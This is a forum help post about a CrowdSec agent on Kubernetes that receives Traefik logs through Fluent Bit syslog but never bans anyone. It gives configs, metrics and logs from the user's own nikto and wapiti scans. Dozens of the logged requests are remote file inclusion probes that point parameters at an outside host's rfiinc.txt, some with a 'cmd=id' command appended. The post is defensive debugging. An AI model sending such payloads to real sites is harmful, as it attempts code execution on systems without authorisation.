Hello,
First of all, thanks for the traefik collection!
It took me a while, but I managed to send Traefik logs to the Crowdsec agent via Fluent Bit and syslog.
To verify the whole pipeline, through a VPN, I used both wapiti and nikto to pentest the domain. To verify the syslog input, I sent the syslog both to the server and to my dev machine. Though, after quite some tests, I never managed to get banned. Can someone help me find out why?
To set the context, I'm working on Kubernetes, and I have already published a couple of my manifests in this post.
By the way, for syslog, the "appname" tag seems to be mandatory for it to work (maybe other tags too?) but it's not written. Did I miss it in the doc? Or is it usually mandatory? I literally discovered what a syslog server is, so maybe I'm missing something.
To install the traefik collection, I have added the following line to the env config file:
COLLECTIONS: "crowdsecurity/traefik crowdsecurity/linux crowdsecurity/sshd"
To install Fluent Bit, I've used the Helm chart with this pipeline configuration:
## https://docs.fluentbit.io/manual/pipeline/inputs
inputs: |
  [INPUT]
      Name              tail
      Path              /var/log/containers/*.log
      multiline.parser  docker, cri
      Tag               kube.*
      Mem_Buf_Limit     5MB
      Skip_Long_Lines   On

  [INPUT]
      Name              systemd
      Tag               host.*
      Systemd_Filter    _SYSTEMD_UNIT=kubelet.service
      Read_From_Tail    On

  [INPUT]
      name              node_exporter_metrics
      tag               node_metrics
      scrape_interval   5

## https://docs.fluentbit.io/manual/pipeline/filters
filters: |
  [FILTER]
      Name                kubernetes
      Match               kube.*
      Merge_Log           On
      Keep_Log            Off
      K8S-Logging.Parser  On
      K8S-Logging.Exclude On

  ## Duplicate kubernetes key
  [FILTER]
      Name                modify
      Match               kube.*
      Hard_copy           kubernetes kubernetes_sd_key

  ## Unnest kubernetes properties
  [FILTER]
      Name                nest
      Match               kube.*
      Operation           lift
      Nested_under        kubernetes_sd_key
      Add_prefix          kubernetes_

## https://docs.fluentbit.io/manual/pipeline/outputs
outputs: |
  [OUTPUT]
      name                 syslog
      match                kube.var.log.containers.traefik*
      host                 crowdsec-agent.kube-system
      port                 514
      mode                 udp
      syslog_format        rfc5424
      syslog_maxsize       2048
      syslog_appname_key   kubernetes_container_name
      syslog_hostname_key  kubernetes_host
      syslog_procid_key    kubernetes_pod_name
      syslog_sd_key        kubernetes
      syslog_message_key   log

  [OUTPUT]
      name                 syslog
      match                kube.var.log.containers.traefik*
      host                 192.168.1.80
      port                 8514
      mode                 udp
      syslog_format        rfc5424
      syslog_maxsize       2048
      syslog_appname_key   kubernetes_container_name
      syslog_hostname_key  kubernetes_host
      syslog_procid_key    kubernetes_pod_name
      syslog_msgid_key     kubernetes_time
      syslog_sd_key        kubernetes
      syslog_message_key   log
To start the syslog data source with crowdsec, I have this config:
apiVersion: v1
kind: ConfigMap
metadata:
  name: crowdsec-agent-files-conf
  namespace: kube-system
data:
  acquis.yaml: |
    source: syslog
    listen_addr: 0.0.0.0
    listen_port: 514
    max_message_len: 2048
    labels:
      type: syslog
The crowdsec-agent container startup logs:
$ kubectl -n kube-system logs crowdsec-agent-f4cc5db9c-nd5lp
Regenerate local agent credentials
time="12-12-2021 06:05:01 PM" level=info msg="machine 'localhost' deleted successfully"
time="12-12-2021 06:05:01 PM" level=info msg="Machine 'localhost' successfully added to the local API"
time="12-12-2021 06:05:01 PM" level=info msg="API credentials dumped to '/etc/crowdsec/local_api_credentials.yaml'"
Check if lapi need to register automatically an agent
time="12-12-2021 06:05:01 PM" level=info msg="Wrote new 188652 bytes index to /etc/crowdsec/hub/.index.json"
time="12-12-2021 06:05:02 PM" level=info msg="crowdsecurity/linux : up-to-date"
time="12-12-2021 06:05:02 PM" level=info msg="Item 'crowdsecurity/linux' is up-to-date"
time="12-12-2021 06:05:02 PM" level=info msg="Run 'sudo systemctl reload crowdsec' for the new configuration to be effective."
time="12-12-2021 06:05:02 PM" level=info msg="crowdsecurity/whitelists : up-to-date"
time="12-12-2021 06:05:02 PM" level=info msg="Item 'crowdsecurity/whitelists' is up-to-date"
time="12-12-2021 06:05:02 PM" level=info msg="Run 'sudo systemctl reload crowdsec' for the new configuration to be effective."
time="12-12-2021 06:05:02 PM" level=warning msg="crowdsecurity/docker-logs : overwrite"
time="12-12-2021 06:05:02 PM" level=info msg="Enabled crowdsecurity/docker-logs"
time="12-12-2021 06:05:02 PM" level=info msg="Run 'sudo systemctl reload crowdsec' for the new configuration to be effective."
time="12-12-2021 06:05:02 PM" level=warning msg="crowdsecurity/traefik-logs : overwrite"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/http-logs : overwrite"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/http-crawl-non_statics : overwrite"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/http-probing : overwrite"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/http-bad-user-agent : overwrite"
time="12-12-2021 06:05:03 PM" level=info msg="downloading data 'https://raw.githubusercontent.com/crowdsecurity/sec-lists/master/web/bad_user_agents.txt' in '/var/lib/crowdsec/data/bad_user_agents.txt'"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/http-path-traversal-probing : overwrite"
time="12-12-2021 06:05:03 PM" level=info msg="downloading data 'https://raw.githubusercontent.com/crowdsecurity/sec-lists/master/web/path_traversal.txt' in '/var/lib/crowdsec/data/http_path_traversal.txt'"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/http-sensitive-files : overwrite"
time="12-12-2021 06:05:03 PM" level=info msg="downloading data 'https://raw.githubusercontent.com/crowdsecurity/sec-lists/master/web/sensitive_data.txt' in '/var/lib/crowdsec/data/sensitive_data.txt'"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/http-sqli-probing : overwrite"
time="12-12-2021 06:05:03 PM" level=info msg="downloading data 'https://raw.githubusercontent.com/crowdsecurity/sec-lists/master/web/sqli_probe_patterns.txt' in '/var/lib/crowdsec/data/sqli_probe_patterns.txt'"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/http-xss-probing : overwrite"
time="12-12-2021 06:05:03 PM" level=info msg="downloading data 'https://raw.githubusercontent.com/crowdsecurity/sec-lists/master/web/xss_probe_patterns.txt' in '/var/lib/crowdsec/data/xss_probe_patterns.txt'"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/http-backdoors-attempts : overwrite"
time="12-12-2021 06:05:03 PM" level=info msg="downloading data 'https://raw.githubusercontent.com/crowdsecurity/sec-lists/master/web/backdoors.txt' in '/var/lib/crowdsec/data/backdoors.txt'"
time="12-12-2021 06:05:03 PM" level=warning msg="ltsich/http-w00tw00t : overwrite"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/http-generic-bf : overwrite"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/http-open-proxy : overwrite"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/base-http-scenarios : overwrite"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/base-http-scenarios : overwrite"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/traefik : overwrite"
time="12-12-2021 06:05:03 PM" level=info msg="/etc/crowdsec/collections/base-http-scenarios.yaml already exists."
time="12-12-2021 06:05:03 PM" level=info msg="/etc/crowdsec/collections/traefik.yaml already exists."
time="12-12-2021 06:05:03 PM" level=info msg="Enabled crowdsecurity/traefik"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/syslog-logs : overwrite"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/geoip-enrich : overwrite"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/dateparse-enrich : overwrite"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/sshd-logs : overwrite"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/ssh-bf : overwrite"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/ssh-slow-bf : overwrite"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/sshd : overwrite"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/sshd : overwrite"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/linux : overwrite"
time="12-12-2021 06:05:03 PM" level=info msg="/etc/crowdsec/collections/sshd.yaml already exists."
time="12-12-2021 06:05:03 PM" level=info msg="/etc/crowdsec/collections/linux.yaml already exists."
time="12-12-2021 06:05:03 PM" level=info msg="Enabled crowdsecurity/linux"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/sshd-logs : overwrite"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/ssh-bf : overwrite"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/ssh-slow-bf : overwrite"
time="12-12-2021 06:05:03 PM" level=warning msg="crowdsecurity/sshd : overwrite"
time="12-12-2021 06:05:03 PM" level=info msg="/etc/crowdsec/collections/sshd.yaml already exists."
time="12-12-2021 06:05:03 PM" level=info msg="Enabled crowdsecurity/sshd"
time="12-12-2021 06:05:03 PM" level=info msg="Run 'sudo systemctl reload crowdsec' for the new configuration to be effective."
time="12-12-2021 18:05:03" level=info msg="Crowdsec v1.2.1-docker-dd03d073558e380c283afe66942f537c3da647ff"
time="12-12-2021 18:05:03" level=info msg="Loading prometheus collectors"
time="12-12-2021 18:05:03" level=info msg="Loading CAPI pusher"
time="12-12-2021 18:05:03" level=info msg="initiating plugin broker"
time="12-12-2021 18:05:03" level=debug msg="starting plugin" args="[/usr/local/lib/crowdsec/plugins/notification-http]" path=/usr/local/lib/crowdsec/plugins/notification-http
time="12-12-2021 18:05:03" level=debug msg="plugin started" path=/usr/local/lib/crowdsec/plugins/notification-http pid=83
time="12-12-2021 18:05:03" level=debug msg="waiting for RPC address" path=/usr/local/lib/crowdsec/plugins/notification-http
time="12-12-2021 18:05:03" level=debug msg="using plugin" version=1
time="12-12-2021 18:05:03" level=debug msg="plugin address" @module=http-plugin address=/tmp/plugin170019443 network=unix
time="12-12-2021 18:05:03" level=trace msg="waiting for stdio data"
time="12-12-2021 18:05:03" level=info msg="registered plugin http_default"
time="12-12-2021 18:05:03" level=info msg="initiated plugin broker"
time="12-12-2021 18:05:03" level=info msg="start crowdsec api push (interval: 30s)"
time="12-12-2021 18:05:03" level=info msg="start crowdsec api pull (interval: 2h)"
time="12-12-2021 18:05:03" level=warning msg="scenario list is empty, will not pull yet"
time="12-12-2021 18:05:03" level=info msg="Loading grok library /etc/crowdsec/patterns"
time="12-12-2021 18:05:04" level=info msg="capi metrics: metrics sent successfully"
time="12-12-2021 18:05:04" level=info msg="start crowdsec api send metrics (interval: 30m)"
time="12-12-2021 18:05:05" level=info msg="Loading enrich plugins"
time="12-12-2021 18:05:05" level=info msg="Successfully registered enricher 'GeoIpCity'"
time="12-12-2021 18:05:05" level=info msg="Successfully registered enricher 'GeoIpASN'"
time="12-12-2021 18:05:05" level=info msg="Successfully registered enricher 'IpToRange'"
time="12-12-2021 18:05:05" level=info msg="Successfully registered enricher 'reverse_dns'"
time="12-12-2021 18:05:05" level=info msg="Successfully registered enricher 'ParseDate'"
time="12-12-2021 18:05:05" level=info msg="Loading parsers 8 stages"
time="12-12-2021 18:05:05" level=info msg="Loaded 1 parser nodes" file=/etc/crowdsec/parsers/s00-raw/docker-logs.yaml
time="12-12-2021 18:05:05" level=info msg="Loaded 2 parser nodes" file=/etc/crowdsec/parsers/s00-raw/syslog-logs.yaml
time="12-12-2021 18:05:05" level=info msg="Loaded 1 parser nodes" file=/etc/crowdsec/parsers/s01-parse/sshd-logs.yaml
time="12-12-2021 18:05:05" level=info msg="Loaded 1 parser nodes" file=/etc/crowdsec/parsers/s01-parse/traefik-logs.yaml
time="12-12-2021 18:05:05" level=info msg="Loaded 1 parser nodes" file=/etc/crowdsec/parsers/s02-enrich/dateparse-enrich.yaml
time="12-12-2021 18:05:05" level=info msg="Loaded 1 parser nodes" file=/etc/crowdsec/parsers/s02-enrich/geoip-enrich.yaml
time="12-12-2021 18:05:05" level=info msg="Loaded 1 parser nodes" file=/etc/crowdsec/parsers/s02-enrich/http-logs.yaml
time="12-12-2021 18:05:05" level=info msg="Loaded 1 parser nodes" file=/etc/crowdsec/parsers/s02-enrich/whitelists.yaml
time="12-12-2021 18:05:05" level=info msg="Loaded 9 nodes, 3 stages"
time="12-12-2021 18:05:05" level=info msg="Loading postoverflow Parsers"
time="12-12-2021 18:05:05" level=info msg="Loaded 0 nodes, 0 stages"
time="12-12-2021 18:05:05" level=info msg="Loading 13 scenario files"
time="12-12-2021 18:05:05" level=info msg="Adding trigger bucket" cfg=bold-darkness file=/etc/crowdsec/scenarios/http-open-proxy.yaml name=crowdsecurity/http-open-proxy
time="12-12-2021 18:05:05" level=info msg="Adding leaky bucket" cfg=snowy-butterfly file=/etc/crowdsec/scenarios/http-generic-bf.yaml name=crowdsecurity/http-generic-bf
time="12-12-2021 18:05:05" level=info msg="Adding leaky bucket" cfg=autumn-cherry file=/etc/crowdsec/scenarios/http-sensitive-files.yaml name=crowdsecurity/http-sensitive-files
time="12-12-2021 18:05:05" level=info msg="Adding leaky bucket" cfg=misty-sunset file=/etc/crowdsec/scenarios/http-bad-user-agent.yaml name=crowdsecurity/http-bad-user-agent
time="12-12-2021 18:05:05" level=info msg="Adding leaky bucket" cfg=cold-tree file=/etc/crowdsec/scenarios/http-crawl-non_statics.yaml name=crowdsecurity/http-crawl-non_statics
time="12-12-2021 18:05:05" level=info msg="Adding leaky bucket" cfg=floral-fire file=/etc/crowdsec/scenarios/http-xss-probing.yaml name=crowdsecurity/http-xss-probbing
time="12-12-2021 18:05:05" level=info msg="Adding leaky bucket" cfg=aged-cherry file=/etc/crowdsec/scenarios/http-backdoors-attempts.yaml name=crowdsecurity/http-backdoors-attempts
time="12-12-2021 18:05:05" level=info msg="Adding leaky bucket" cfg=little-mountain file=/etc/crowdsec/scenarios/http-sqli-probing.yaml name=crowdsecurity/http-sqli-probbing-detection
time="12-12-2021 18:05:05" level=info msg="Adding trigger bucket" cfg=young-wind file=/etc/crowdsec/scenarios/http-w00tw00t.yaml name=ltsich/http-w00tw00t
time="12-12-2021 18:05:05" level=info msg="Adding leaky bucket" cfg=icy-wave file=/etc/crowdsec/scenarios/ssh-slow-bf.yaml name=crowdsecurity/ssh-slow-bf
time="12-12-2021 18:05:05" level=info msg="Adding leaky bucket" cfg=shy-mountain file=/etc/crowdsec/scenarios/ssh-slow-bf.yaml name=crowdsecurity/ssh-slow-bf_user-enum
time="12-12-2021 18:05:05" level=info msg="Adding leaky bucket" cfg=small-firefly file=/etc/crowdsec/scenarios/ssh-bf.yaml name=crowdsecurity/ssh-bf
time="12-12-2021 18:05:05" level=info msg="Adding leaky bucket" cfg=rough-lake file=/etc/crowdsec/scenarios/ssh-bf.yaml name=crowdsecurity/ssh-bf_user-enum
time="12-12-2021 18:05:05" level=info msg="Adding leaky bucket" cfg=solitary-firefly file=/etc/crowdsec/scenarios/http-path-traversal-probing.yaml name=crowdsecurity/http-path-traversal-probing
time="12-12-2021 18:05:05" level=info msg="Adding leaky bucket" cfg=spring-rain file=/etc/crowdsec/scenarios/http-probing.yaml name=crowdsecurity/http-probing
time="12-12-2021 18:05:05" level=warning msg="Loaded 15 scenarios"
time="12-12-2021 18:05:05" level=info msg="loading acquisition file : /configMap/acquis.yaml"
time="12-12-2021 18:05:05" level=info msg="Starting syslog datasource configuration" type=syslog
time="12-12-2021 18:05:05" level=warning msg="Starting processing data"
time="12-12-2021 18:05:05" level=info msg="127.0.0.1 - [Sun, 12 Dec 2021 18:05:05 CET] \"POST /v1/watchers/login HTTP/1.1 200 151.803514ms \"crowdsec/v1.2.1-docker-dd03d073558e380c283afe66942f537c3da647ff\" \""
time="12-12-2021 18:05:05" level=info msg="last CAPI pull is newer than 1h30, skip."
time="12-12-2021 18:05:05" level=info msg="127.0.0.1 - [Sun, 12 Dec 2021 18:05:05 CET] \"POST /v1/watchers/login HTTP/1.1 200 145.725626ms \"crowdsec/v1.2.1-docker-dd03d073558e380c283afe66942f537c3da647ff\" \""
To double-check that data was sent to the crowdsec agent, I used the CLI, with the following result:
/ # cscli metrics
INFO[12-12-2021 05:41:22 PM] Buckets Metrics:
+--------------------------------------+---------------+-----------+--------------+--------+---------+
| BUCKET | CURRENT COUNT | OVERFLOWS | INSTANCIATED | POURED | EXPIRED |
+--------------------------------------+---------------+-----------+--------------+--------+---------+
| crowdsecurity/http-crawl-non_statics | - | - | 10 | 17 | 10 |
| crowdsecurity/http-probing | 1 | - | 3 | 9 | 2 |
+--------------------------------------+---------------+-----------+--------------+--------+---------+
INFO[12-12-2021 05:41:22 PM] Acquisition Metrics:
+-------------------+------------+--------------+----------------+------------------------+
| SOURCE | LINES READ | LINES PARSED | LINES UNPARSED | LINES POURED TO BUCKET |
+-------------------+------------+--------------+----------------+------------------------+
| syslog:10.42.1.92 | 2350 | 194 | 2156 | 1 |
| syslog:10.42.1.93 | 20 | 20 | - | - |
| syslog:10.42.1.94 | 2733 | 431 | 2302 | 25 |
+-------------------+------------+--------------+----------------+------------------------+
INFO[12-12-2021 05:41:22 PM] Parser Metrics:
+----------------------------------------+-------+--------+----------+
| PARSERS | HITS | PARSED | UNPARSED |
+----------------------------------------+-------+--------+----------+
| child-child-crowdsecurity/traefik-logs | 57954 | 13374 | 44580 |
| child-crowdsecurity/http-logs | 1935 | 1130 | 805 |
| child-crowdsecurity/traefik-logs | 9561 | 645 | 8916 |
| crowdsecurity/dateparse-enrich | 645 | 645 | - |
| crowdsecurity/geoip-enrich | 645 | 645 | - |
| crowdsecurity/http-logs | 645 | 485 | 160 |
| crowdsecurity/syslog-logs | 5103 | 5103 | - |
| crowdsecurity/traefik-logs | 5103 | 645 | 4458 |
| crowdsecurity/whitelists | 645 | 645 | - |
+----------------------------------------+-------+--------+----------+
INFO[12-12-2021 05:41:22 PM] Local Api Metrics:
+--------------------+--------+------+
| ROUTE | METHOD | HITS |
+--------------------+--------+------+
| /v1/alerts | GET | 625 |
| /v1/decisions | GET | 1312 |
| /v1/watchers/login | POST | 1526 |
+--------------------+--------+------+
INFO[12-12-2021 05:41:22 PM] Local Api Machines Metrics:
+-----------+------------+--------+------+
| MACHINE | ROUTE | METHOD | HITS |
+-----------+------------+--------+------+
| localhost | /v1/alerts | GET | 625 |
+-----------+------------+--------+------+
INFO[12-12-2021 05:41:22 PM] Local Api Bouncers Metrics:
+-----------------+---------------+--------+------+
| BOUNCER | ROUTE | METHOD | HITS |
+-----------------+---------------+--------+------+
| traefik-bouncer | /v1/decisions | GET | 1312 |
+-----------------+---------------+--------+------+
INFO[12-12-2021 05:41:22 PM] Local Api Bouncers Decisions:
+-----------------+---------------+-------------------+
| BOUNCER | EMPTY ANSWERS | NON-EMPTY ANSWERS |
+-----------------+---------------+-------------------+
| traefik-bouncer | 1310 | 2 |
+-----------------+---------------+-------------------+
The command to check decisions:
$ kubectl -n kube-system exec -it crowdsec-agent-f4cc5db9c-nd5lp -- sh
/ # cscli decisions list
No active decisions
/ #
A sample of traefik logs while wapiti was running:
$ kubectl logs -fn kube-system traefik-9f79b8c4c-mlvlm
194.34.132.19 - - [12/Dec/2021:16:19:44 +0000] "GET /noticias.php?inc=http://cirt.net/rfiinc.txt?? HTTP/1.1" - - "-" "-" 14939 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:44 +0000] "GET /nucleus/plugins/skinfiles/index.php?DIR_LIBS=http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14940 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:44 +0000] "GET /nuke_path/iframe.php?file=http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14941 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:44 +0000] "GET /nukebrowser.php?filnavn=http://cirt.net/rfiinc.txt?&filhead=XXpathXX&cmd=id HTTP/1.1" - - "-" "-" 14942 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:44 +0000] "GET /nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14943 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:44 +0000] "GET /nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://cirt.net/rfiinc.txt?? HTTP/1.1" - - "-" "-" 14944 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:44 +0000] "GET /oaboard_en/forum.php?inc=http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14945 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:44 +0000] "GET /ocp-103/index.php?req_path=http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14946 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:44 +0000] "GET /ocs/include/footer.inc.php?fullpath=http://cirt.net/rfiinc.txt?? HTTP/1.1" - - "-" "-" 14947 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:44 +0000] "GET /ocs/include/theme.inc.php?fullpath=http://cirt.net/rfiinc.txt?? HTTP/1.1" - - "-" "-" 14948 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:44 +0000] "GET /ocs/openemr-2.8.2/custom/import_xml.php?srcdir=http://cirt.net/rfiinc.txt?? HTTP/1.1" - - "-" "-" 14949 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:44 +0000] "GET /olbookmarks-0.7.4/themes/test1.php?http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14950 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:44 +0000] "GET /oneadmin/adminfoot.php?path[docroot]=http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14951 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:44 +0000] "GET /oneadmin/blogger/sampleblogger.php?path[docroot]=http://cirt.net/rfiinc.txt?? HTTP/1.1" - - "-" "-" 14952 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:44 +0000] "GET /oneadmin/config-bak.php?include_once=http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14953 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:44 +0000] "GET /oneadmin/config.php?path[docroot]=http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14954 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:45 +0000] "GET /oneadmin/ecommerce/sampleecommerce.php?path[docroot]=http://cirt.net/rfiinc.txt?? HTTP/1.1" - - "-" "-" 14955 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:45 +0000] "GET /online.php?config[root_ordner]=http://cirt.net/rfiinc.txt??&cmd=id HTTP/1.1" - - "-" "-" 14956 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:45 +0000] "GET /open-admin/plugins/site_protection/index.php?config%5boi_dir%5d=http://cirt.net/rfiinc.txt?? HTTP/1.1" - - "-" "-" 14957 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:45 +0000] "GET /openi-admin/base/fileloader.php?config[openi_dir]=http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14958 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:45 +0000] "GET /openrat/themes/default/include/html/insert.inc.php?tpl_dir=http://cirt.net/rfiinc.txt???? HTTP/1.1" - - "-" "-" 14959 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:45 +0000] "GET /opensurveypilot/administration/user/lib/group.inc.php?cfgPathToProjectAdmin=http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14960 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:45 +0000] "GET /ops/gals.php?news_file=http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14961 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:45 +0000] "GET /order/login.php?svr_rootscript=http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14962 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:45 +0000] "GET /osData/php121/php121db.php?php121dir=http://cirt.net/rfiinc.txt?%00 HTTP/1.1" - - "-" "-" 14963 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:45 +0000] "GET /ossigeno-suite-2.2_pre1/upload/xax/admin/modules/uninstall_module.php?level=http://cirt.net/rfiinc.txt?? HTTP/1.1" - - "-" "-" 14964 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:45 +0000] "GET /ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php?ossigeno=http://cirt.net/rfiinc.txt?? HTTP/1.1" - - "-" "-" 14965 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:45 +0000] "GET /owimg.php3?path=http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14966 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:45 +0000] "GET /p-news.php?pn_lang=http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14967 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:45 +0000] "GET /pafiledb/includes/pafiledb_constants.php?module_root_path=http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14968 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:45 +0000] "GET /page.php?goto=http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14969 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:46 +0000] "GET /page.php?id=http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14970 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:46 +0000] "GET /panel/common/theme/default/header_setup.php?path[docroot]=http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14971 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:46 +0000] "GET /param_editor.php?folder=http://cirt.net/rfiinc.txt?? HTTP/1.1" - - "-" "-" 14972 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:46 +0000] "GET /parse/parser.php?WN_BASEDIR=http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14973 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:46 +0000] "GET /patch/?language_id=http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14974 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:46 +0000] "GET /patch/tools/send_reminders.php?noSet=0&includedir=http://cirt.net/rfiinc.txt?? HTTP/1.1" - - "-" "-" 14975 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:46 +0000] "GET /paypalipn/ipnprocess.php?INC=http://cirt.net/rfiinc.txt?? HTTP/1.1" - - "-" "-" 14976 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:46 +0000] "GET /pda/pda_projects.php?offset=http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14977 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:46 +0000] "GET /phfito/phfito-post?SRC_PATH=http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14978 "-" "-" 0ms
194.34.132.19 - - [12/Dec/2021:16:19:46 +0000] "GET /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" 14979 "-" "-" 0ms
Here is a sample of the syslog sent to my dev machine; according to Fluent Bit, it should be the same as the ones sent to the crowdsec agent:
$ nc -u -l 8514
<14>1 2021-12-12T16:43:47.848158Z windell traefik traefik-9f79b8c4c-mlvlm - [kubernetes pod_name="traefik-9f79b8c4c-mlvlm" namespace_name="kube-system" pod_id="7818a1e6-eacd-476e-b6e0-e39d82f0432b" host="windell" container_name="traefik" docker_id="ee98498d62970b7ae9c8d91baca7bf5558922c5da490113b814883601a0306bd" container_hash="docker.io/library/traefik@sha256:ea0aa8832bfd08369166baecd40b35fc58979df8f5dc5182e4e63ee6adbe66db" container_image="docker.io/library/traefik:2.2.11"] ﻿10.42.1.1 - - [12/Dec/2021:16:43:47 +0000] "GET /ping HTTP/1.1" 200 2 "-" "-" 17623 "ping@internal" "-" 0ms
<14>1 2021-12-12T16:43:48.267831Z windell traefik traefik-9f79b8c4c-mlvlm - [kubernetes pod_name="traefik-9f79b8c4c-mlvlm" namespace_name="kube-system" pod_id="7818a1e6-eacd-476e-b6e0-e39d82f0432b" host="windell" container_name="traefik" docker_id="ee98498d62970b7ae9c8d91baca7bf5558922c5da490113b814883601a0306bd" container_hash="docker.io/library/traefik@sha256:ea0aa8832bfd08369166baecd40b35fc58979df8f5dc5182e4e63ee6adbe66db" container_image="docker.io/library/traefik:2.2.11"] ﻿194.34.132.19 - - [12/Dec/2021:16:43:48 +0000] "GET /zqxjFASpplgsBq.html HTTP/1.1" 404 153 "-" "-" 17624 "frigg-public-routes-22735e324d6d7eb80733@kubernetescrd" "http://10.42.1.239:80" 23ms
